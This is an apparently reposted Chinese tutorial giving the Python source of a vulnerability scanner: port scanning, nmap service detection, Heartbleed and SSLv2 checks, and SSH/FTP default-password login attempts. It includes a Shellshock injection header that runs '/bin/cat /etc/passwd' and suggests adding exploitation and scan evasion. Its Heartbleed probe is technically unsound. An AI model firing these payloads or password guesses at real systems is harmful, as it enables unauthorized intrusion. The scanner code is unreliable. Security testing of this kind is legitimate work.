当前位置: 首页 > news >正文

Python实例题:Python打造漏洞扫描器

目录

Python实例题

题目

代码实现

实现原理

模块化设计:

多线程扫描:

漏洞检测技术:

关键代码解析

端口扫描功能

Heartbleed 漏洞检测

Shellshock 漏洞检测

使用说明

安装依赖:

基本用法:

扫描常见端口:

扫描指定端口范围:

输出结果到文件:

扩展建议

增强功能:

性能优化:

用户界面:

安全增强:

Python实例题

题目

Python打造漏洞扫描器

代码实现

import socket
import requests
import threading
import time
import nmap
import argparse
import json
from urllib.parse import urlparse
import concurrent.futures
import reclass VulnerabilityScanner:def __init__(self):self.target = ""self.ports = []self.threads = 50self.timeout = 2self.vuln_db = self._load_vulnerability_database()self.results = {"target": "","scan_time": "","open_ports": [],"vulnerabilities": []}def _load_vulnerability_database(self):"""加载漏洞数据库"""vuln_db = {"heartbleed": {"name": "OpenSSL Heartbleed (CVE-2014-0160)","description": "OpenSSL 1.0.1至1.0.1f版本中存在的缓冲区溢出漏洞,允许攻击者读取内存内容。","port": 443,"protocol": "https","check_function": "check_heartbleed"},"shellshock": {"name": "Shellshock (CVE-2014-6271)","description": "Bash环境变量解析漏洞,允许远程执行代码。","port": 80,"protocol": "http","check_function": "check_shellshock"},"sslv2": {"name": "SSLv2支持检测","description": "服务器支持不安全的SSLv2协议,可能导致多种攻击。","port": 443,"protocol": "https","check_function": "check_sslv2"},"weak_password": {"name": "弱密码检测","description": "检测常见服务的弱密码","services": ["ssh", "ftp", "smtp", "telnet"],"check_function": "check_weak_password"}}return vuln_dbdef set_target(self, target):"""设置扫描目标"""self.target = targetself.results["target"] = targetdef set_ports(self, ports):"""设置扫描端口"""if isinstance(ports, int):self.ports = [ports]elif isinstance(ports, list):self.ports = portselif isinstance(ports, str):if '-' in ports:start, end = map(int, ports.split('-'))self.ports = list(range(start, end + 1))else:self.ports = [int(ports)]def set_threads(self, threads):"""设置扫描线程数"""self.threads = threadsdef set_timeout(self, timeout):"""设置连接超时时间"""self.timeout = timeoutdef scan_ports(self):"""扫描目标主机的开放端口"""print(f"[+] 开始扫描目标 {self.target} 的端口...")start_time = time.time()open_ports = []def scan_port(port):try:sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.settimeout(self.timeout)result = sock.connect_ex((self.target, port))if result == 0:open_ports.append(port)service = socket.getservbyport(port) if port < 1024 else "unknown"print(f"[+] 端口 {port} 开放 ({service})")sock.close()except Exception as e:print(f"[-] 扫描端口 {port} 时出错: {e}")with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:executor.map(scan_port, self.ports)end_time = time.time()print(f"[+] 端口扫描完成,耗时 {end_time - start_time:.2f} 秒")print(f"[+] 共发现 {len(open_ports)} 个开放端口")self.results["open_ports"] = open_portsself.results["scan_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())return open_portsdef identify_services(self):"""识别开放端口上的服务"""print(f"[+] 开始识别 {self.target} 上的服务...")nm = nmap.PortScanner()for port in self.results["open_ports"]:try:nm.scan(self.target, str(port), arguments='-sV -Pn')if self.target in nm and port in nm[self.target]['tcp']:service_info = nm[self.target]['tcp'][port]service_name = service_info['name']service_version = service_info.get('version', 'unknown')print(f"[+] 端口 {port}: {service_name} ({service_version})")# 更新结果for port_info in self.results["open_ports"]:if port_info == port:self.results["open_ports"][self.results["open_ports"].index(port_info)] = {"port": port,"service": service_name,"version": service_version}except Exception as e:print(f"[-] 识别端口 {port} 服务时出错: {e}")def check_heartbleed(self, port=443):"""检测Heartbleed漏洞 (CVE-2014-0160)"""print(f"[+] 检测 {self.target}:{port} 是否存在Heartbleed漏洞...")try:# 简化版Heartbleed检测,实际应用中应使用更健壮的检测方法import sslcontext = ssl.create_default_context()context.check_hostname = Falsecontext.verify_mode = ssl.CERT_NONEwith socket.create_connection((self.target, port)) as sock:with context.wrap_socket(sock, server_hostname=self.target) as ssock:# 发送特制的心跳包heartbleed_payload = bytearray([0x18, 0x03, 0x02, 0x00, 0x03, 0x01, 0x40, 0x00])ssock.sendall(heartbleed_payload)response = ssock.recv(1024)# 简单判断:如果响应长度大于预期,则可能存在漏洞if len(response) > 7:print(f"[!] 警告: {self.target}:{port} 可能存在Heartbleed漏洞!")self.results["vulnerabilities"].append({"name": self.vuln_db["heartbleed"]["name"],"description": self.vuln_db["heartbleed"]["description"],"port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Heartbleed漏洞")except Exception as e:print(f"[-] 检测Heartbleed漏洞时出错: {e}")def check_shellshock(self, port=80):"""检测Shellshock漏洞 (CVE-2014-6271)"""print(f"[+] 检测 {self.target}:{port} 是否存在Shellshock漏洞...")try:url = f"http://{self.target}:{port}"headers = {"User-Agent": "() { :; }; echo; echo; /bin/cat /etc/passwd"}response = requests.get(url, headers=headers, timeout=self.timeout)# 检查响应中是否包含/etc/passwd内容if re.search(r'root:[x*]:0:0:', response.text):print(f"[!] 警告: {self.target}:{port} 可能存在Shellshock漏洞!")self.results["vulnerabilities"].append({"name": self.vuln_db["shellshock"]["name"],"description": self.vuln_db["shellshock"]["description"],"port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Shellshock漏洞")except Exception as e:print(f"[-] 检测Shellshock漏洞时出错: {e}")def check_sslv2(self, port=443):"""检测是否支持不安全的SSLv2协议"""print(f"[+] 检测 {self.target}:{port} 是否支持SSLv2...")try:import sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv2)context.check_hostname = Falsecontext.verify_mode = ssl.CERT_NONEtry:with socket.create_connection((self.target, port)) as sock:with context.wrap_socket(sock, server_hostname=self.target) as ssock:print(f"[!] 警告: {self.target}:{port} 支持SSLv2协议!")self.results["vulnerabilities"].append({"name": self.vuln_db["sslv2"]["name"],"description": self.vuln_db["sslv2"]["description"],"port": port,"severity": "Medium"})except ssl.SSLError as e:if "protocol version" in str(e):print(f"[-] {self.target}:{port} 不支持SSLv2协议")else:print(f"[-] 检测SSLv2协议时出错: {e}")except Exception as e:print(f"[-] 检测SSLv2协议时出错: {e}")def check_weak_password(self, service, username="admin", password_list=["admin", "password", "123456"]):"""检测特定服务的弱密码"""print(f"[+] 检测 {self.target} 的 {service} 服务弱密码...")try:if service == "ssh":import paramikofor password in password_list:try:ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())ssh.connect(self.target, username=username, password=password, timeout=self.timeout)print(f"[!] 警告: {self.target} 的SSH服务存在弱密码: {username}/{password}")self.results["vulnerabilities"].append({"name": f"{service}弱密码","description": f"发现{service}服务使用弱密码: {username}/{password}","service": service,"severity": "High"})ssh.close()breakexcept Exception as e:passelif service == "ftp":import ftplibfor password in password_list:try:ftp = ftplib.FTP(self.target)ftp.login(username, password)print(f"[!] 警告: {self.target} 的FTP服务存在弱密码: {username}/{password}")self.results["vulnerabilities"].append({"name": f"{service}弱密码","description": f"发现{service}服务使用弱密码: {username}/{password}","service": service,"severity": "High"})ftp.quit()breakexcept Exception as e:pass# 可以添加更多服务的弱密码检测except Exception as e:print(f"[-] 检测{service}弱密码时出错: {e}")def run_full_scan(self):"""运行完整扫描(端口扫描 + 服务识别 + 漏洞检测)"""print(f"[+] 开始对 {self.target} 进行完整扫描...")# 1. 端口扫描self.scan_ports()# 2. 服务识别self.identify_services()# 3. 漏洞检测for vuln_id, vuln_info in self.vuln_db.items():if vuln_id == "weak_password":# 弱密码检测需要特殊处理for service in vuln_info["services"]:for port_info in self.results["open_ports"]:if isinstance(port_info, dict) and port_info["service"] == service:self.check_weak_password(service)else:# 其他漏洞检测for port_info in self.results["open_ports"]:port = port_info["port"] if isinstance(port_info, dict) else port_infoif port == vuln_info["port"]:check_function = getattr(self, vuln_info["check_function"])check_function(port)# 4. 输出结果self.print_results()return self.resultsdef print_results(self):"""打印扫描结果"""print("\n" + "=" * 50)print(f"扫描结果: {self.target}")print("=" * 50)print("\n[+] 开放端口:")if not self.results["open_ports"]:print("  未发现开放端口")else:for port_info in self.results["open_ports"]:if isinstance(port_info, dict):print(f"  端口 {port_info['port']}: {port_info['service']} ({port_info['version']})")else:print(f"  端口 {port_info}")print("\n[+] 发现的漏洞:")if not self.results["vulnerabilities"]:print("  未发现漏洞")else:for vuln in self.results["vulnerabilities"]:print(f"  - {vuln['name']} (端口: {vuln.get('port', 'N/A')}, 严重程度: {vuln['severity']})")print(f"    {vuln['description']}")print("\n" + "=" * 50)def export_results(self, filename="scan_results.json"):"""导出扫描结果到JSON文件"""try:with open(filename, 'w') as f:json.dump(self.results, f, indent=4)print(f"[+] 扫描结果已导出到 {filename}")except Exception as e:print(f"[-] 导出结果时出错: {e}")def main():parser = argparse.ArgumentParser(description='Python漏洞扫描器')parser.add_argument('-t', '--target', help='目标主机IP或域名', required=True)parser.add_argument('-p', '--ports', help='扫描端口范围,如: 22,80,443 或 1-1000')parser.add_argument('-T', '--threads', help='线程数,默认50', type=int, default=50)parser.add_argument('-o', '--output', help='输出结果文件')args = parser.parse_args()scanner = VulnerabilityScanner()scanner.set_target(args.target)# 设置扫描端口if args.ports:if ',' in args.ports:ports = [int(p.strip()) for p in args.ports.split(',')]scanner.set_ports(ports)elif '-' in args.ports:start, end = map(int, args.ports.split('-'))scanner.set_ports(list(range(start, end + 1)))else:scanner.set_ports(int(args.ports))else:# 默认扫描常见端口common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3306, 3389, 5432, 8080]scanner.set_ports(common_ports)# 设置线程数if args.threads:scanner.set_threads(args.threads)# 运行完整扫描results = scanner.run_full_scan()# 导出结果if args.output:scanner.export_results(args.output)if __name__ == "__main__":main()    

实现原理

这个漏洞扫描器基于以下核心技术实现:

  • 模块化设计

    • 分离端口扫描、服务识别和漏洞检测功能
    • 支持多种漏洞检测模块
    • 可扩展的漏洞数据库
  • 多线程扫描

    • 使用线程池提高扫描效率
    • 可配置的线程数和超时时间
  • 漏洞检测技术

    • 协议特定检测(如 Heartbleed、SSLv2)
    • 服务弱密码检测
    • 基于 HTTP 头的漏洞检测(如 Shellshock)

关键代码解析

端口扫描功能

def scan_ports(self):print(f"[+] 开始扫描目标 {self.target} 的端口...")def scan_port(port):try:sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.settimeout(self.timeout)result = sock.connect_ex((self.target, port))if result == 0:open_ports.append(port)service = socket.getservbyport(port) if port < 1024 else "unknown"print(f"[+] 端口 {port} 开放 ({service})")sock.close()except Exception as e:print(f"[-] 扫描端口 {port} 时出错: {e}")open_ports = []with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:executor.map(scan_port, self.ports)self.results["open_ports"] = open_portsreturn open_ports

Heartbleed 漏洞检测

def check_heartbleed(self, port=443):print(f"[+] 检测 {self.target}:{port} 是否存在Heartbleed漏洞...")try:import sslcontext = ssl.create_default_context()context.check_hostname = Falsecontext.verify_mode = ssl.CERT_NONEwith socket.create_connection((self.target, port)) as sock:with context.wrap_socket(sock, server_hostname=self.target) as ssock:heartbleed_payload = bytearray([0x18, 0x03, 0x02, 0x00, 0x03, 0x01, 0x40, 0x00])ssock.sendall(heartbleed_payload)response = ssock.recv(1024)if len(response) > 7:print(f"[!] 警告: {self.target}:{port} 可能存在Heartbleed漏洞!")self.results["vulnerabilities"].append({"name": "OpenSSL Heartbleed (CVE-2014-0160)","description": "OpenSSL 1.0.1至1.0.1f版本中存在的缓冲区溢出漏洞...","port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Heartbleed漏洞")except Exception as e:print(f"[-] 检测Heartbleed漏洞时出错: {e}")

Shellshock 漏洞检测

def check_shellshock(self, port=80):print(f"[+] 检测 {self.target}:{port} 是否存在Shellshock漏洞...")try:url = f"http://{self.target}:{port}"headers = {"User-Agent": "() { :; }; echo; echo; /bin/cat /etc/passwd"}response = requests.get(url, headers=headers, timeout=self.timeout)if re.search(r'root:[x*]:0:0:', response.text):print(f"[!] 警告: {self.target}:{port} 可能存在Shellshock漏洞!")self.results["vulnerabilities"].append({"name": "Shellshock (CVE-2014-6271)","description": "Bash环境变量解析漏洞,允许远程执行代码。","port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Shellshock漏洞")except Exception as e:print(f"[-] 检测Shellshock漏洞时出错: {e}")

使用说明

安装依赖

pip install python-nmap requests

基本用法

python vulnerability_scanner.py -t 192.168.1.100 -p 22,80,443

扫描常见端口

python vulnerability_scanner.py -t example.com

扫描指定端口范围

python vulnerability_scanner.py -t 192.168.1.1 -p 1-1000 -T 100

输出结果到文件

python vulnerability_scanner.py -t target.com -o results.json

扩展建议

  • 增强功能

    • 添加更多漏洞检测模块(SQL 注入、XSS 等)
    • 实现漏洞利用功能(需要谨慎使用)
    • 添加 CVE 数据库自动更新功能
  • 性能优化

    • 使用异步 I/O 提高扫描效率
    • 添加智能端口扫描策略
    • 实现扫描结果缓存机制
  • 用户界面

    • 开发 Web 界面
    • 添加进度显示和扫描报告
    • 支持批量扫描和任务管理
  • 安全增强

    • 添加速率限制防止被防火墙拦截
    • 实现扫描伪装技术
    • 增加扫描结果加密功能
http://www.xdnf.cn/news/643699.html

相关文章:

  • 【AI论文】KRIS-基准测试:评估下一代智能图像编辑模型的基准
  • LangChain4j HelloWorld
  • 分词算法BPE详解和CLIP的应用
  • 测试计划与用例撰写指南
  • SAP Commerce(Hybris)开发实战(二):登陆生成token问题
  • 企业级智能体 —— 企业 AI 发展的下一个风口?
  • 【公式】批量添加MathType公式编号
  • [Linux]磁盘分区及swap交换空间
  • 第38节:PyTorch模型训练流程详解
  • Baklib知识中台构建实战
  • [DS]使用 Python 库中自带的数据集来实现上述 50 个数据分析和数据可视化程序的示例代码
  • 【LangChain全栈开发指南】从LLM应用到企业级AI助手构建
  • LLM多平台统一调用系统-LiteLLM概述
  • MYSQL备份恢复知识:第五章:备份原理
  • 渗透测试流程-下篇
  • 定时任务调度平台XXL-JOB
  • 基于Python实现JSON点云数据的3D可视化与过滤
  • 美团2025年校招笔试真题手撕教程(三)
  • Spring 源码阅读(循环依赖、Bean 生命周期、AOP、IOC) - 5.2.15.RELEASE
  • 电路笔记(通信):RS-485总线 物理层规范 接口及其组成部分 瑞萨电子RS-485总线笔记
  • vue3中computed计算属性和watch监听的异同点
  • Qt实战教程:设计并实现一个结构清晰、功能完整的桌面应用
  • 机械师安装ubantu双系统:一、制作系统盘
  • React从基础入门到高级实战:React 核心技术 - 组件通信与 Props 深入
  • Pandas数据规整
  • 香橙派3B学习笔记3:宝塔 Linux 面板的安装
  • 2025年- H46-Lc154 --543. 二叉树的直径(深度、递归、深搜)--Java版
  • 华为OD机试真题—— 矩阵匹配(2025B卷:200分)Java/python/JavaScript/C/C++/GO最佳实现
  • MySQL的查询进阶
  • 学习STC51单片机15(芯片为STC89C52RCRC)